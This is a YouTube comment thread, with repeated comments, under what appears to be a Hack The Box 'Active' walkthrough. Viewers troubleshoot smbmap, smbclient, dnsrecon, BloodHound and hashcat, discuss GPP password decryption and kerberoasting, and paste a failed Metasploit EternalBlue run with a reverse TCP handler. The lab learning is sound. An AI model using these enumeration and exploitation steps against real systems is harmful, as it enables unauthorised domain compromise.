I was doing the box last night. I finished it myself. I make a habit of then looking at writeups to learn anything new... going back to last night, I spent an hour going through they SMB shares manually. Good times.
@@Stonekom Honestly, yes. This guy has been invaluable to me, even if I have pivoted into a different direction. The stuff I learned fom this guys content had a tangible effect on where I am today.
@@zzzzzzzzZzZZzzzaZzz My situation is pretty good and still in the security industry, though I pivoted into a different direction. I used what I learned from this and a few other channels, they certainly were foundational in where I am now.
I saw this misconfiguration in a environment and thanx for showing your approach , helped me create proper blue-team detection rules.. As well as creating a honeytoken account and just removing all the logon hours!
I think it's just hashcat running on a box with an Nvidia GTX 1080 installed. It's not too fancy to set up. If you want to learn how to use hashcat check out the HTB Academy tutorial.
So helpful, thanks a ton as always!! Was looking forward to this video from you! I'm in my OSCP labs right now and the Windows machines are definitely the hardest with the least info out. Thanks again!!!
I got results from smbclient and can even get into shares folder but smbmap didn't show anything not even shared folders. It says Access Denied. Why it behaves like that?
hey there Ipp, I've got a question. How did you know that in order to decrypt the password you need to use the gppdecrypt program. I mean I know that you've done these boxes before, but even then, is it identifiable just by looking at it?
I dont know what is wrong with this box, ive reverted the box and typing smbclient -L //10.10.10.100 -N to list shares but it doesnt give me a list of shares. It says protocol negotiation failed: NT_STATUS_CONNECTION_RESET.
Anybody knows why I do not see groups.xml file? Neither when I list files/directories using smbmap nor when I am searching for file itself: smbmap -R Replication -H 10.10.10.100 -A Groups.xml ?
You should really just use Windows. It may be possible to do something similar within impacket, but there are just too many bugs when doing this many types of RPC Calls.
This is why you don't use domain administrator accounts to run Kerberos services! The hash of any kerberos service account can be collected via the kerberoasting he does, so ideally every service account has a strong password and follows the principle of least privilege.
Just one thing: how can you tell that the administrator is kerberoastable by watching the graph in bloodhound ? Cause I see you've got the node admnistrator and the node dc.active.htb.
any ideas why dns recon keeps maxing out my ram, then overflowing into swap memory and completely freezing my Linux vm? I have upped my ram on my Kali VM to 16gigs and whenever I run dnsrecon it keeps using more and more ram until it maxes it out and completely freezes the virtual machine until I shut it down and start it up again. This can't be normal can it? Appreciate all the videos!
the same for me and after some time I get killed my smb connection and I get: [*] Performing Reverse Lookup from 10.0.0.0 to 10.255.255.255 Killed my smb works fine until I run dnsrecon
@@susnoname I can't remember how I fixed this but I did. I think I reinstalled Kali from scratch. Actually, I think first I downloaded an older version of dnsrecon from github and used that instead. I think reinstalling Kali from scratch worked for fixing the current version for me though. I can't remember for sure.
Hi, I know this is an old video but since you are still active. Could you make the font larger in the terminal. I watch your videos on my phone and it's really hard to read. Great content though
I’ve experimented with trying to make it readable on phones. Decided not to as when going into programs like GDB/Ghidra/etc large font makes it difficult in my computer too. I don’t really prepare enough to switch between layouts when recording so don’t think I’ll be increasing it anymore
Hello IppSec! man, got hooked with hackthebox, fantastic way to learn about pentesting, trying to clear all the easy ones first and then move on into harder stuff. I have been getting the same error over and over and for some reason i don't find an answer to it, when i run ms17_010_eternalblue to try to gain access to a windows box i always get the same message: [*] Started reverse TCP handler on 10.10.15.10:4444 [*] 10.10.10.161:445 - Connecting to target for exploitation. [+] 10.10.10.161:445 - Connection established for exploitation. [!] 10.10.10.161:445 - Target OS selected not valid for OS indicated by SMB reply [!] 10.10.10.161:445 - Disable VerifyTarget option to proceed manually... [-] 10.10.10.161:445 - Unable to continue with improper OS Target. [*] Exploit completed, but no session was created. Hope you see this, Thanks for what you do man.
That script connects to 445 and enumerates the version (target os) prior to throwing the exploit. It sees the os isn’t compatible with target and exits. Try it on Blue
hello dear, I have been trying to enumerate Kioptrix1 (which is running samba 2.2.1a) using "smbclient -L host", however, I'm getting NT_SATATUS_IO_TIMEOUT error. I looked at the Wireshark output, I found out that the server (Kioptrix) is not responding to the "Negotiate Protocol Request" packet sent by the client. Please I need your help! Thank you in advance.
I full screened this at 07:30 before leaving for work, fell asleep at the computer, and woke up with the fear cause I thought it was 11:04am. Forgot I full screened it lol
wondering that how this box is an easy one lol, i have to watch video 3 times in a row in order to just understand what is even happening. Anyways thanks for the video #windowsBoxesSucks
For anyone getting "Authentication Error" when running smbmap. There are some python packages that need to be installed/updated. See "Install Requirements" section at github.com/ShawnDEvans/smbmap
this guys brain is absolutely massive
I was doing the box last night. I finished it myself. I make a habit of then looking at writeups to learn anything new... going back to last night, I spent an hour going through they SMB shares manually. Good times.
Its going to take me forever to get anywhere near this level of knowledge of all the systems and commands
You better now?
@@Stonekom Honestly, yes. This guy has been invaluable to me, even if I have pivoted into a different direction. The stuff I learned fom this guys content had a tangible effect on where I am today.
I would like to ask you, how is your situation now as an employee in the field or what?
@@zzzzzzzzZzZZzzzaZzz good though out of date by now. I pivoted into a different part of security
@@zzzzzzzzZzZZzzzaZzz My situation is pretty good and still in the security industry, though I pivoted into a different direction. I used what I learned from this and a few other channels, they certainly were foundational in where I am now.
9:01 smbmap -R (capital R is no longer in latest Kali version). Only -r (lowercase r) is available
add --depth flag with -r and it works.
smbmap -r Replication -H 10.10.10.100 --depth 10
thank you
I saw this misconfiguration in a environment and thanx for showing your approach , helped me create proper blue-team detection rules.. As well as creating a honeytoken account and just removing all the logon hours!
Could you one day do a video on how you set up your kraken box? I've been thinking about setting up something similar in AWS
@IppSec
I think it's just hashcat running on a box with an Nvidia GTX 1080 installed. It's not too fancy to set up. If you want to learn how to use hashcat check out the HTB Academy tutorial.
@@DavidThomsenPhD dammit, you’re persistent
So helpful, thanks a ton as always!! Was looking forward to this video from you! I'm in my OSCP labs right now and the Windows machines are definitely the hardest with the least info out. Thanks again!!!
windows boxes are pain in ass, im suffering too
@@striple765 me too
For anybody getting an error with smbmap and updatedb make sure you are running root or sudo on the command.
thaaaank you i feel like ive wasted days no i have on not providing the sudo command.
Just saved me so much time!
I got results from smbclient and can even get into shares folder but smbmap didn't show anything not even shared folders. It says Access Denied. Why it behaves like that?
same here
clone the latest smbmap from git
pip3 install --upgrade impacket
or
pip install --upgrade impacket
Then it works fine now
hey there Ipp, I've got a question. How did you know that in order to decrypt the password you need to use the gppdecrypt program. I mean I know that you've done these boxes before, but even then, is it identifiable just by looking at it?
Yes, it is the default way Group Policy stores passwords. Just seeing the password in Groups.xml in the SYSVOL directory tells me what it is.
So complicated and advanced but it's very informative
I just grabbed the flag thru SMB actually. Never did PSexec, but would have been fun to do it that way.
I dont know what is wrong with this box, ive reverted the box and typing smbclient -L //10.10.10.100 -N to list shares but it doesnt give me a list of shares. It says protocol negotiation failed: NT_STATUS_CONNECTION_RESET.
Anybody knows why I do not see groups.xml file? Neither when I list files/directories using smbmap nor when I am searching for file itself: smbmap -R Replication -H 10.10.10.100 -A Groups.xml
?
add the depth switch as TongaRoots mentioned above "smbmap -R Replication --depth 10 -H 10.10.10.100"
How would one go about with the Bloodhound step using kali instead of windows?
You should really just use Windows. It may be possible to do something similar within impacket, but there are just too many bugs when doing this many types of RPC Calls.
@@ippsec Alright will do, thank you very much for your quick response!
running bloodhound-python remotely in Linux would give the same result but thanks though for the great walkthrough!
Hi @IppSec
Do you mind if you can share the specs of your kraken ?
I saw you were running 4 GPUs, does hashcat auto-detects these GPUs ?
This is why you don't use domain administrator accounts to run Kerberos services! The hash of any kerberos service account can be collected via the kerberoasting he does, so ideally every service account has a strong password and follows the principle of least privilege.
Is it possible to connect to the windows machine from Linux, as a non admin user, having the password in plaintext, without RDP enabled?
That’s a lot of stipulations. It is possible in bad configurations, ie powershell remoting
@@ippsec Thank you ippsec. It just seems odd to a windows newbie's perspective, that we have several pass-the-hash tools, but no pass-the-pass :)
Hello, i want to prevent from using ldapsearch or other tools to enumeration ldap on Domain. can you guide me how to prevent it?
hey what happend to the premire thing ?! found it helpful & cool that we could ask you questions!
I do it when I'm around to moderate the channel/answer questions. I've been traveling for the past 2-3 weeks.
when I scan using the same nmap command (-sV and -sC) it says all ports are filtered and doesn't give any version information :/
anyone in oscp should watch this video
I am.. Love everything that ippsec does.
indeed this is pretty cool. but way more advanced than oscp with regards the kerbroasting part, isnt it
8:21, look below, its telling u which shares are open!
What if smb is still complaining with NT_STATUS_INVALID_INFO_CLASS listing \* ? Thanks
Great video, thank you!
getadusers asking for import version tried many way but didn't get results yet
That's odd, I was able to psexec (the .py version from impacket) to Admin perms with the SVC_TGS.
Still a great BloodHound tutorial though!
Just one thing: how can you tell that the administrator is kerberoastable by watching the graph in bloodhound ? Cause I see you've got the node admnistrator and the node dc.active.htb.
any ideas why dns recon keeps maxing out my ram, then overflowing into swap memory and completely freezing my Linux vm?
I have upped my ram on my Kali VM to 16gigs and whenever I run dnsrecon it keeps using more and more ram until it maxes it out and completely freezes the virtual machine until I shut it down and start it up again. This can't be normal can it?
Appreciate all the videos!
the same for me and after some time I get killed my smb connection and I get:
[*] Performing Reverse Lookup from 10.0.0.0 to 10.255.255.255
Killed
my smb works fine until I run dnsrecon
@@susnoname I can't remember how I fixed this but I did. I think I reinstalled Kali from scratch.
Actually, I think first I downloaded an older version of dnsrecon from github and used that instead. I think reinstalling Kali from scratch worked for fixing the current version for me though. I can't remember for sure.
@@Dave-ll2fm thanks ! I will try github as reinstalling is something what I really don't want to do.
This box was pretty cool.
I did this box without bloodhound I just did kerberoasting after I got the password.
What's the difference between xargs grep and just piping to grep?
there are some commands that dont work just with pipe, try google it
Hi, I know this is an old video but since you are still active. Could you make the font larger in the terminal. I watch your videos on my phone and it's really hard to read. Great content though
I’ve experimented with trying to make it readable on phones. Decided not to as when going into programs like GDB/Ghidra/etc large font makes it difficult in my computer too. I don’t really prepare enough to switch between layouts when recording so don’t think I’ll be increasing it anymore
What's the hardware specification of your kracken machine
Last I heard he had 4x 1080s. Might be upgraded since.
Yeah you can see when he initializes hashcat that it recognizes 4 1080's. That's the dream right there lol
Hi can u send link to video where configure Bloodhound?
Why not search Ippsec.rocks for bloodhound and choose one of the first videos
I think on that dns issue on the windows box you could change the binding order on the nic but could be wrong
nmap scan says all ports are filtered for me with same setup
That's awesome..
This box is one in the row i couldn't resolve (:
Thanks
I think there's a way to specify DNS in sharphound
Awesome video . ur the boss
Could you make a walkthrough on smasher ? I want to see your approach to it.
I plan to do it around Christmas time.
holy shit.... 4 1080's....
Getting a user on this was pretty easy , but root was way difficult if you dont have AD exp :-)
Hello IppSec! man, got hooked with hackthebox, fantastic way to learn about pentesting, trying to clear all the easy ones first and then move on into harder stuff. I have been getting the same error over and over and for some reason i don't find an answer to it, when i run ms17_010_eternalblue to try to gain access to a windows box i always get the same message:
[*] Started reverse TCP handler on 10.10.15.10:4444
[*] 10.10.10.161:445 - Connecting to target for exploitation.
[+] 10.10.10.161:445 - Connection established for exploitation.
[!] 10.10.10.161:445 - Target OS selected not valid for OS indicated by SMB reply
[!] 10.10.10.161:445 - Disable VerifyTarget option to proceed manually...
[-] 10.10.10.161:445 - Unable to continue with improper OS Target.
[*] Exploit completed, but no session was created.
Hope you see this,
Thanks for what you do man.
That script connects to 445 and enumerates the version (target os) prior to throwing the exploit. It sees the os isn’t compatible with target and exits. Try it on Blue
smbmap -H 10.10.10.100 works fine. Why is this happening?
clone the latest smbmap from git
pip3 install --upgrade impacket
or
pip install --upgrade impacket
Then it works fine now
I failed to get root ☹️
Thanks for the video ippsec 😊
hello dear,
I have been trying to enumerate Kioptrix1 (which is running samba 2.2.1a) using "smbclient -L host", however, I'm getting NT_SATATUS_IO_TIMEOUT error. I looked at the Wireshark output, I found out that the server (Kioptrix) is not responding to the "Negotiate Protocol Request" packet sent by the client.
Please I need your help! Thank you in advance.
I full screened this at 07:30 before leaving for work, fell asleep at the computer, and woke up with the fear cause I thought it was 11:04am. Forgot I full screened it lol
hahaha :D
wondering that how this box is an easy one lol, i have to watch video 3 times in a row in order to just understand what is even happening. Anyways thanks for the video
#windowsBoxesSucks
Do you solve machines in a VM? If so , why?
Hold me accountable yall!!!
Very difficult
For anyone getting "Authentication Error" when running smbmap. There are some python packages that need to be installed/updated. See "Install Requirements" section at github.com/ShawnDEvans/smbmap
Hey, thanks for that, had been getting that error. I installed the requirements and it still won't work. Still get the same error, any ideas?
@@karanbhayani5571 did you install the requirements as sudo?
i though this box was boring
Try Offshore
I don't see the Groups.xml on the share.
-DNSServer 3.2.1.1
can you speak little bit slowly? :-)
you can change it on YT video, I am not native, he speaks pretty good not too fast no too slow, just perfect